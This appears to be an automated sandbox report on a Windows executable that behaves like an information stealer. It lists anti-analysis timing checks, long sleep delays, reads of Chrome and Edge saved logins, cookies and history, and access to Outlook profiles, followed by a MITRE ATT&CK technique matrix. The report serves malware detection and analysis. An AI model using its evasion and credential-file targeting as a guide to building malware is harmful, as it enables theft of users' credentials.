            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeAPI/Special instruction interceptor: Address: 4DFBD4B
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeAPI/Special instruction interceptor: Address: 320BD4B
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeRDTSC instruction interceptor: First address: 4DD4513 second address: 4DD4513 instructions: 0x00000000 rdtsc 0x00000002 test edx, eax 0x00000004 test ax, 000019D5h 0x00000008 cmp ebx, ecx 0x0000000a jc 00007F77704F03F4h 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeRDTSC instruction interceptor: First address: 31E4513 second address: 31E4513 instructions: 0x00000000 rdtsc 0x00000002 test edx, eax 0x00000004 test ax, 000019D5h 0x00000008 cmp ebx, ecx 0x0000000a jc 00007F7770C50344h 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeMemory allocated: 3600000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeMemory allocated: 33EE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeMemory allocated: 35EE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi9FC6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\NDCNDvC27F.exe TID: 7712Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exe TID: 7712Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405731
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_004061E5 FindFirstFileW,FindClose,0_2_004061E5
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_00402706 FindFirstFileW,10_2_00402706
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_00405731
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_004061E5 FindFirstFileW,FindClose,10_2_004061E5
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeThread delayed: delay time: 600000Jump to behavior
            Source: NDCNDvC27F.exe, 0000000A.00000002.3059914659.00000000038B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
            Source: NDCNDvC27F.exe, 0000000A.00000002.3059914659.000000000391B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
            Source: NDCNDvC27F.exe, 0000000A.00000002.3059914659.000000000391B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeAPI call chain: ExitProcess graph end nodegraph_0-4472
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeAPI call chain: ExitProcess graph end nodegraph_0-4471
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040620C
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess created: C:\Users\user\Desktop\NDCNDvC27F.exe "C:\Users\user\Desktop\NDCNDvC27F.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeQueries volume information: C:\Users\user\Desktop\NDCNDvC27F.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_00405EC4 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405EC4
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000A.00000002.3080268352.0000000033EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: NDCNDvC27F.exe PID: 1372, type: MEMORYSTR
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: 0000000A.00000002.3080268352.0000000033FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: NDCNDvC27F.exe PID: 1372, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000A.00000002.3080268352.0000000033EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: NDCNDvC27F.exe PID: 1372, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            11
            Process Injection
            11
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            System Network Configuration Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS12
            File and Directory Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets215
            System Information Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.